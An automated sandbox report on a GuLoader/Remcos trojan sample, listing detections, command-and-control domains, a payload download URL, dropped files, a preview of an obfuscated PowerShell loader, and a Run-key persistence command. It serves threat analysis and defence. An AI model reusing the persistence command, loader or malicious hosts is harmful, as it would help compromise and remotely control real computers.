CLOUDFLARENETUS United States 26->57 49 C:\Users\user\AppData\Roaming\mqerms.dat, data 26->49 dropped 81 Installs new ROOT certificates 26->81 83 Installs a global keyboard hook 26->83 41 cmd.exe 26->41         started        59 172.67.191.112, 443, 49204 CLOUDFLARENETUS United States 33->59 file12 85 Uses dynamic DNS services 53->85 signatures13 process14 process15 43 reg.exe 1 41->43         started       

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              documento.exe46%ReversingLabsWin32.Trojan.Guloader
              documento.exe30%VirustotalBrowse

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\Deinotherium\Pugilist\Unreturnableness\Tapeta\Vulgare\documento.exe46%ReversingLabsWin32.Trojan.Guloader
              C:\Users\user\AppData\Local\Temp\Deinotherium\Pugilist\Unreturnableness\Tapeta\Vulgare\documento.exe30%VirustotalBrowse

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              learfo55ozj01.duckdns.org16%VirustotalBrowse
              ricohltd.top21%VirustotalBrowse
              learfo55ozj02.duckdns.org1%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
              http://ocsp.entrust.net030%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
              http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
              http://ocsp.entrust.net0D0%URL Reputationsafe
              learfo55ozj01.duckdns.org100%Avira URL Cloudmalware
              https://ricohltd.top/100%Avira URL Cloudmalware
              https://ricohltd.top/ELFpBDmh152.bin100%Avira URL Cloudmalware
              http://go.microsoB0%Avira URL Cloudsafe
              learfo55ozj01.duckdns.org16%VirustotalBrowse
              https://ricohltd.top/21%VirustotalBrowse
              https://ricohltd.top/ELFpBDmh152.bin21%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              learfo55ozj01.duckdns.org
              		192.169.69.26
              		truetrueunknown
              ricohltd.top
              		104.21.60.38
              		truefalseunknown
              learfo55ozj02.duckdns.org
              		unknown
              		unknowntrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://ricohltd.top/ELFpBDmh152.binfalse
              • 21%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown
              learfo55ozj01.duckdns.orgtrue
              • 16%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.533716177.00000000032B9000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl0wab.exe, 00000006.00000002.866892514.0000000000449000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://nsis.sf.net/NSIS_Errordocumento.exe, documento.exe, 00000000.00000000.336717009.0000000000409000.00000008.00000001.01000000.00000003.sdmp, documento.exe, 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpfalse
                  		high
                  http://crl.entrust.net/server1.crl0wab.exe, 00000006.00000002.866892514.0000000000449000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://go.microsoBpowershell.exe, 0000000F.00000002.747126778.00000000003B9000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://ocsp.entrust.net03wab.exe, 00000006.00000002.866892514.0000000000449000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/powershell.exe, 00000003.00000002.533716177.00000000032B9000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.533716177.00000000032B9000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/Licensepowershell.exe, 00000003.00000002.533716177.00000000032B9000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://contoso.com/Iconpowershell.exe, 00000003.00000002.533716177.00000000032B9000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0wab.exe, 00000006.00000002.866892514.0000000000449000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.diginotar.nl/cps/pkioverheid0wab.exe, 00000006.00000002.866892514.0000000000449000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://nsis.sf.net/NSIS_ErrorErrordocumento.exe, 00000000.00000000.336717009.0000000000409000.00000008.00000001.01000000.00000003.sdmp, documento.exe, 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpfalse
                        		high
                        http://ocsp.entrust.net0Dwab.exe, 00000006.00000002.866892514.0000000000449000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.530743058.0000000002291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.568783013.0000000002931000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.749519743.0000000002011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.613484329.0000000002771000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://secure.comodo.com/CPS0wab.exe, 00000006.00000002.866892514.0000000000449000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://crl.entrust.net/2048ca.crl0wab.exe, 00000006.00000002.866892514.0000000000449000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://ricohltd.top/wab.exe, 00000006.00000002.866892514.00000000003D4000.00000004.00000020.00020000.00000000.sdmpfalse
                              • 21%, Virustotal, Browse
                              • Avira URL Cloud: malware
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              104.21.60.38
                              		ricohltd.topUnited States
                              		13335CLOUDFLARENETUSfalse
                              172.67.191.112
                              		unknownUnited States
                              		13335CLOUDFLARENETUSfalse
                              192.169.69.26
                              		learfo55ozj01.duckdns.orgUnited States
                              		23033WOWUStrue

                              General Information

                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1434785
                              Start date and time:2024-05-01 18:18:28 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 10m 37s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                              Number of analysed new started processes analysed:24
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:documento.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@25/23@359/3
                              EGA Information:
                              • Successful, ratio: 71.4%
                              HCA Information:
                              • Successful, ratio: 89%
                              • Number of executed functions: 136
                              • Number of non-executed functions: 75
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                              • Execution Graph export aborted for target powershell.exe, PID 1784 because it is empty
                              • Execution Graph export aborted for target powershell.exe, PID 3672 because it is empty
                              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                              • Report size getting too big, too many NtEnumerateValueKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              09:20:37AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Startup key %knkbrdet% -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;%knkbrdet% ($Preeternal)
                              09:20:45AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Startup key %knkbrdet% -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;%knkbrdet% ($Preeternal)
                              18:19:13API Interceptor126x Sleep call for process: documento.exe modified
                              18:19:28API Interceptor555x Sleep call for process: powershell.exe modified
                              18:20:36API Interceptor1846991x Sleep call for process: wab.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              104.21.60.38COPY.docGet hashmaliciousUnknownBrowse
                              • ricohltd.top/pages/microzx.scr
                              93Vc4lrukRxn3WG.exeGet hashmaliciousFormBookBrowse
                              • www.peacemyanmar.com/c8ec/?i2Jx-=JbnHKQNA4AubQ4cSTRqCUjsV30iNMKVb/qiRb+TdpY0tAokv3PP5G3/qX2Zn4Kqzke2C&3fb=t8Cle8U
                              172.67.191.112.04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                z77EU17439-FT-MILKYLUXGOUDAMILD.exeGet hashmaliciousGuLoader, RemcosBrowse
                                  sample.exeGet hashmaliciousGuLoader, RemcosBrowse
                                    Copy of Noyan Order Form Global Importing Group 2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                      Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeGet hashmaliciousGuLoader, RemcosBrowse
                                        107. PN-EN-1090-2+A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                          z42MNA2024000000041-KWINTMADI-11310Y_K.exeGet hashmaliciousGuLoader, RemcosBrowse
                                            UMMAN #U0130HRACAT AFR5641 910-1714 1633.exeGet hashmaliciousGuLoader, RemcosBrowse
                                              192.169.69.26&nuevo_pedido#..vbsGet hashmaliciousUnknownBrowse
                                              • servidorarquivos.duckdns.org/e/e
                                              transferencia_Hsbc.xlsxGet hashmaliciousUnknownBrowse
                                              • servidorarquivos.duckdns.org/e/e
                                              http://www.secure-0fflce-o365.duckdns.org/Get hashmaliciousUnknownBrowse
                                              • www.secure-0fflce-o365.duckdns.org/
                                              http://muqzwpkojc.duckdns.orgGet hashmaliciousUnknownBrowse
                                              • muqzwpkojc.duckdns.org/
                                              http://jrljsybkku.duckdns.orgGet hashmaliciousUnknownBrowse
                                              • jrljsybkku.duckdns.org/
                                              last.exeGet hashmaliciousRedLineBrowse
                                              • siyatermi.duckdns.org:17044/
                                              5BDF181C629182A48CE6810CD0987FB0C1242DED4C9E7.exeGet hashmaliciousRedLineBrowse
                                              • redline957.duckdns.org:35253/IRemotePanel
                                              1ZXSAOPKH09SA_PAYMENT-COPY.jsGet hashmaliciousVjW0rmBrowse
                                              • jamnnd.duckdns.org:8024/Vre
                                              LB9lJxaVP7.exeGet hashmaliciousUnknownBrowse
                                              • cpanelcustomershost.duckdns.org/SystemEnv/uploads/newsoftware-tester_Gurledjm.jpg
                                              Scan0049938_pdf.com.exeGet hashmaliciousUnknownBrowse
                                              • cpanelcustomershost.duckdns.org/SystemEnv/uploads/newsoftware-tester_Wrpqkawe.bmp

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              learfo55ozj01.duckdns.org.04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                              • 193.222.96.21
                                              z39103_PN-EN-1090-1_A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                              • 193.222.96.21
                                              z6FORMATOPROVEEDORESMETAX.exeGet hashmaliciousGuLoader, RemcosBrowse
                                              • 193.222.96.21
                                              z77EU17439-FT-MILKYLUXGOUDAMILD.exeGet hashmaliciousGuLoader, RemcosBrowse
                                              • 193.222.96.21
                                              sample.exeGet hashmaliciousGuLoader, RemcosBrowse
                                              • 193.222.96.21
                                              Copy of Noyan Order Form Global Importing Group 2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                              • 193.222.96.21
                                              Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeGet hashmaliciousGuLoader, RemcosBrowse
                                              • 193.222.96.21
                                              107. PN-EN-1090-2+A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                              • 193.222.96.21
                                              #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeGet hashmaliciousGuLoader, RemcosBrowse
                                              • 193.222.96.21
                                              FINAL CMR.-Transportauftrag Nachlauf new.exeGet hashmaliciousGuLoader, RemcosBrowse
                                              • 193.222.96.21
                                              ricohltd.top.04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                              • 172.67.191.112
                                              z6FORMATOPROVEEDORESMETAX.exeGet hashmaliciousGuLoader, RemcosBrowse
                                              • 104.21.60.38
                                              z77EU17439-FT-MILKYLUXGOUDAMILD.exeGet hashmaliciousGuLoader, RemcosBrowse
                                              • 172.67.191.112
                                              sample.exeGet hashmaliciousGuLoader, RemcosBrowse
                                              • 172.67.191.112
                                              Copy of Noyan Order Form Global Importing Group 2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                              • 172.67.191.112
                                              Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeGet hashmaliciousGuLoader, RemcosBrowse
                                              • 172.67.191.112
                                              107. PN-EN-1090-2+A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                              • 172.67.191.112
                                              #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeGet hashmaliciousGuLoader, RemcosBrowse
                                              • 104.21.60.38
                                              FINAL CMR.-Transportauftrag Nachlauf new.exeGet hashmaliciousGuLoader, RemcosBrowse
                                              • 104.21.60.38
                                              04172024121853atr reteks.exeGet hashmaliciousGuLoader, RemcosBrowse
                                              • 104.21.60.38

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              CLOUDFLARENETUShttp://criticalfacilitiessolutions.comGet hashmaliciousUnknownBrowse
                                              • 172.67.152.97
                                              free-pdf-creator.exeGet hashmaliciousUnknownBrowse
                                              • 104.17.25.14
                                              uF8wwjO0iU.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 172.67.74.152
                                              OWrVfOdM62.rtfGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 104.26.13.205
                                              https://yiod563zkz8o3x.blob.core.windows.net/yiod563zkz8o3x/1.html?4qhwvy8167VjYz242vffrhartbz938YRYGCGVWKKZIIRL45416MSZZ14335C15#15/242-8167/938-45416-14335Get hashmaliciousHTMLPhisherBrowse
                                              • 104.21.80.104
                                              https://corpsierramadre.com/Get hashmaliciousUnknownBrowse
                                              • 104.21.93.126
                                              access_version_x32-64_pack.exeGet hashmaliciousUnknownBrowse
                                              • 104.20.138.65
                                              2zdult23rz.exeGet hashmaliciousRisePro StealerBrowse
                                              • 104.26.4.15
                                              baVrLvRHZY.exeGet hashmaliciousLummaCBrowse
                                              • 172.67.141.11
                                              lfY08S61Ig.exeGet hashmaliciousLummaCBrowse
                                              • 104.21.81.139
                                              WOWUSLUMEN3547583853959599359959359Cercospora.batGet hashmaliciousGuLoader, RemcosBrowse
                                              • 192.169.69.26
                                              https://pub-68c8c7ae0a9b4e62b5641da4fe04590d.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • 192.169.69.26
                                              https://svuch3d.duckdns.org/Get hashmaliciousUnknownBrowse
                                              • 192.169.69.26
                                              https://6mw23o.duckdns.org/Get hashmaliciousUnknownBrowse
                                              • 192.169.69.26
                                              https://ixkv5pf.duckdns.org/Get hashmaliciousUnknownBrowse
                                              • 192.169.69.26
                                              87tBuE42ft.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                              • 172.93.222.219
                                              VbVGKkKgdbEScfW.scrGet hashmaliciousNanocore, PureLog StealerBrowse
                                              • 192.169.69.26
                                              dxM4ij1KkuoBK3H.scrGet hashmaliciousNanocoreBrowse
                                              • 192.169.69.26
                                              Q00D5u1xHq.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 208.115.121.80
                                              SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dllGet hashmaliciousCobaltStrikeBrowse
                                              • 45.14.115.125
                                              CLOUDFLARENETUShttp://criticalfacilitiessolutions.comGet hashmaliciousUnknownBrowse
                                              • 172.67.152.97
                                              free-pdf-creator.exeGet hashmaliciousUnknownBrowse
                                              • 104.17.25.14
                                              uF8wwjO0iU.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 172.67.74.152
                                              OWrVfOdM62.rtfGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 104.26.13.205
                                              https://yiod563zkz8o3x.blob.core.windows.net/yiod563zkz8o3x/1.html?4qhwvy8167VjYz242vffrhartbz938YRYGCGVWKKZIIRL45416MSZZ14335C15#15/242-8167/938-45416-14335Get hashmaliciousHTMLPhisherBrowse
                                              • 104.21.80.104
                                              https://corpsierramadre.com/Get hashmaliciousUnknownBrowse
                                              • 104.21.93.126
                                              access_version_x32-64_pack.exeGet hashmaliciousUnknownBrowse
                                              • 104.20.138.65
                                              2zdult23rz.exeGet hashmaliciousRisePro StealerBrowse
                                              • 104.26.4.15
                                              baVrLvRHZY.exeGet hashmaliciousLummaCBrowse
                                              • 172.67.141.11
                                              lfY08S61Ig.exeGet hashmaliciousLummaCBrowse
                                              • 104.21.81.139

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              7dcce5b76c8b17472d024758970a406bnU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
                                              • 104.21.60.38
                                              • 172.67.191.112
                                              QF3YL9rOxB.rtfGet hashmaliciousAgentTeslaBrowse
                                              • 104.21.60.38
                                              • 172.67.191.112
                                              GENERALCANDY INV FWDRB42024.docGet hashmaliciousLokibotBrowse
                                              • 104.21.60.38
                                              • 172.67.191.112
                                              citat-05012024.xla.xlsxGet hashmaliciousUnknownBrowse
                                              • 104.21.60.38
                                              • 172.67.191.112
                                              cotizaci#U00f3n_04302024.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                              • 104.21.60.38
                                              • 172.67.191.112
                                              RFQ-37463746374634.xlsGet hashmaliciousUnknownBrowse
                                              • 104.21.60.38
                                              • 172.67.191.112
                                              RFQ-37463746374634.xlsGet hashmaliciousUnknownBrowse
                                              • 104.21.60.38
                                              • 172.67.191.112
                                              SecuriteInfo.com.Exploit.ShellCode.69.24915.2103.rtfGet hashmaliciousAgentTeslaBrowse
                                              • 104.21.60.38
                                              • 172.67.191.112
                                              SalinaGroup.docGet hashmaliciousFormBookBrowse
                                              • 104.21.60.38
                                              • 172.67.191.112
                                              SecuriteInfo.com.Exploit.ShellCode.69.11288.31380.rtfGet hashmaliciousUnknownBrowse
                                              • 104.21.60.38
                                              • 172.67.191.112

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:modified
                                              Size (bytes):6934
                                              Entropy (8bit):4.7790940094255205
                                              Encrypted:false
                                              SSDEEP:192:+xoe5vVsm5emdDVFn3eGOVpN6K3bkkjo5hgkjDt4iWN3yBGHUdcU6CD:Q/VoGIpN6KQkj26kjh4iUxw
                                              MD5:91D4881F2C812CF8EE07110B290FD7A6
                                              SHA1:0CA688FDC673D0F644EB20B94760B28FF9D79812
                                              SHA-256:3840970DE2FCD631782AE143948A2242742D3228F3C07DF8BEC14D12B42AF35B
                                              SHA-512:4907B135666E0F4F4BC09D36F8C035478E71B5B520B7F0001B8BDB6EE69338436DA5E49541C342B66035580A367C790B1F2F2846264F91E84384542579138BF9
                                              Malicious:false
                                              Preview:PSMODULECACHE......%+./...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........%+./...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                              C:\Users\user\AppData\Local\Temp\1tvwxxbc.uq0.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1

                                              C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry

                                              Download File
                                              Process:C:\Users\user\Desktop\documento.exe
                                              File Type:ASCII text, with very long lines (57843), with no line terminators
                                              Category:dropped
                                              Size (bytes):57843
                                              Entropy (8bit):5.328136114438413
                                              Encrypted:false
                                              SSDEEP:1536:x+qH901wzEySMKs2+d3Wjz7fE60AqiamlgIA7DPVCev:x+qHy15tMtdmM0lWhT
                                              MD5:46B1DD31D500B4168EC508A1344B6868
                                              SHA1:0FCD6154633A721BF05093B7087D5EBEC4E3B89D
                                              SHA-256:391FFC7A3B79AE0DDB3CA578611E5885D62BE4BAFB61C5286C126975B24A7A17
                                              SHA-512:2C86F66321895D48EBF7CE1ED75AF9F1D46CC307D947FAC02E0529B477AD78EFD01DED36E9A4F438CEC35172A11C64531D83CDC7724E44C801E32325ED06CEE2
                                              Malicious:true
                                              Preview:$Arbejdsmarkedernesrigaderne=$Subslots;<#Propelled Antiatommarchens Nathans Jibi Markedsmekanismen #><#samsiske Vuggiest Ordsprogene #><#Sagsbehandlingsregels Preternormal Diakroniens Forsegl Recognitor Andersines #><#Overskriftslinies Arketypers Bilgges Pertusariaceae Timbrels Unwashable #><#Gnidder Slumberproof Blotlgningernes Mandating Billitonite Rich #><#Skovejerens Yammering Bevgelsessystemernes Acromastitis #><#Flamberer Caprification Decriminalize Recitativo patnesses Betonkanonernes #><#lumberjacket palynomorph Vverens Autoforhandleren Unconsiderateness Affedt Kropsbevidst #><#Populrvidenskabernes Razorbill wineconner Dualiteternes #><#Chiropod Besmearer Portamento Pastillerne #><#Fornoejelse Luminaries Assist Nagedes Slackminded #><#Erena Forfrdeliges Domstolsafgrelse Afhaengighedsforhold Strisserne Galochestvlers #><#Fervor Funning Protends #><#Gennemtnkning Pinsedag Postnumrene Polynesians Sagtmodigstes guldbrylluppernes Keepers #><#Contributable Signalisvvr Kresterne #><#d

                                              C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\chatrum.sag

                                              Download File
                                              Process:C:\Users\user\Desktop\documento.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1114
                                              Entropy (8bit):4.655605033691921
                                              Encrypted:false
                                              SSDEEP:24:73BS5bK10ahqTE7TippZO9ZS2k/23adYJi5r9AODujg3:dcKpqTE3iXZMS2k/2eYs5rSO66
                                              MD5:0B5446B68158AB6494017BDFC85DB330
                                              SHA1:D5612E7254F06481257959C7F70FC0625C59F434
                                              SHA-256:3072A2428CE58559FEB3541DD0E2AD2E3C54E05CF802C9A9A149A2386737B004
                                              SHA-512:636A24CA3652A52F14C62D322C9BE0452C5F82397CC7D1F37B7A541AE80B2529A81472E28E10919A202F8CCC555F26C55B42F97AA281375265E90F0DDE045497
                                              Malicious:false
                                              Preview:........<...A2......c.......2.......k!.........;F.....R..............6.K......s.d.B@......m.o....t............e...v................a......{,....;..B.............E../..........Z...S...'.-...q....k....6.1Q........s.......R.....&.1..U7t.....!...`..)..................:...Je./..f...................q........\!.7....C..s....f....A............S............d..d...(.....u...!.e........S@A.....i......i.r..e.f..i....-..N|.9.%*......AC.......?...w..........B..........(...0......|.....x.................c....\.y......."k...................2......g....?.......S.|.......:..+....r.J.........LA.l.....w....f.............~..u..t...[{..S.1.Y.~..Q..........>......T..{.B..~...t.....3. .\.}......c...u.'..[..W..?.[.I....u.........!H..".... q.......n...<...F.aT2........a...........K.f`...^....Z........?|6?.........k........J....o..6kk..m...........Z.......^..j.....x........g.....#......M........P...........E.....q^8...dL.......tfz.e.6Fn@o.............'...........b.z...Y....(.... ................. .:..t...

                                              C:\Users\user\AppData\Local\Temp\Deinotherium\Konservatorier.Paa

                                              Download File
                                              Process:C:\Users\user\Desktop\documento.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):352360
                                              Entropy (8bit):7.642079234337726
                                              Encrypted:false
                                              SSDEEP:6144:qkw/o+WvGYf1vylxKtAbSu8y1ryQPbkch/OiiRf:twxKsvhlROiKf
                                              MD5:A12C50EA816DEA376E39D4FD65741DAC
                                              SHA1:A5B2D86AFD2AFBBCE31AB50004751A4A5CEE2920
                                              SHA-256:AE2D3D6C75E31282295A76DFA22C07C566CBF58161205A26BE6D15B385A3A1BE
                                              SHA-512:810616B8FD42C5BF007A89EC359FD130DD81C424956989CF34D82102E00DC6F9506B6DD6495D833AFF3F216A4122FAB484AF89570FFB3E1DD574C8C6FFD29D48
                                              Malicious:false
                                              Preview:...........ww........:...#..................XXX...........ll.UUU..................!!.....k......(((((.....v...........F...BBB......`................S..c..............__...............g...xx.....2................j........|............55..,,,,...........(........\..W..............~...........5...ZZZZ..5..a.PP.......................dd...........oo.......A.m.....==...........EEE.......a....11............tt....55....EE.-.....2..WW.......SSS............................}....^..y............................................}......WWW........UU..x.........V....4..............QQQ.....~...S..................tttttttt....999....hhhh.((....4........????............s....JJJJJ..............`...mmmmm....gg...........WWW....**.....D.f............................eee.[[[......v.?....n..............EE.EEEE..........\..zz...................N.,.GG.O.........xxx.............#.........................HH.......................//....f........................N..._..........................................2.a.....P

                                              C:\Users\user\AppData\Local\Temp\Deinotherium\Pugilist\Unreturnableness\Tapeta\Vulgare\documento.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Category:dropped
                                              Size (bytes):833309
                                              Entropy (8bit):6.013506782930841
                                              Encrypted:false
                                              SSDEEP:24576:H7/jxjjtjj9JIvxV7kVTwRLRRFHkW7C41jRPx:bhGvX45wRLNl1jRPx
                                              MD5:518C32EDF768D3BE4F268071E0722A0F
                                              SHA1:2F606E59B3900154094978A3C2DCC16A7ADDFD55
                                              SHA-256:E7092EB28DC769559D0D9DB50EF39B664AE5EC4BA76AC580C11DFBFA1C426290
                                              SHA-512:B1AC6888CAA22657FB0E2D44016186075CDE37E3CF65A1ECCE396EB04270900D9CD49C06B1A025215BB8BA134E22F9623549CD73E7896591D16769E8D201BE3D
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 46%
                                              • Antivirus: Virustotal, Detection: 30%, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG.sw..PG..VA..PG.Rich.PG.........PE..L...p..V.................^...........0.......p....@.......................................@..................................s.......@..XB...........................................................................p...............................text...[\.......^.................. ..`.rdata.......p.......b..............@..@.data................v..............@....ndata.......@...........................rsrc...XB...@...D...z..............@..@................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Temp\Deinotherium\Pugilist\Unreturnableness\Tapeta\Vulgare\documento.exe:Zone.Identifier

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
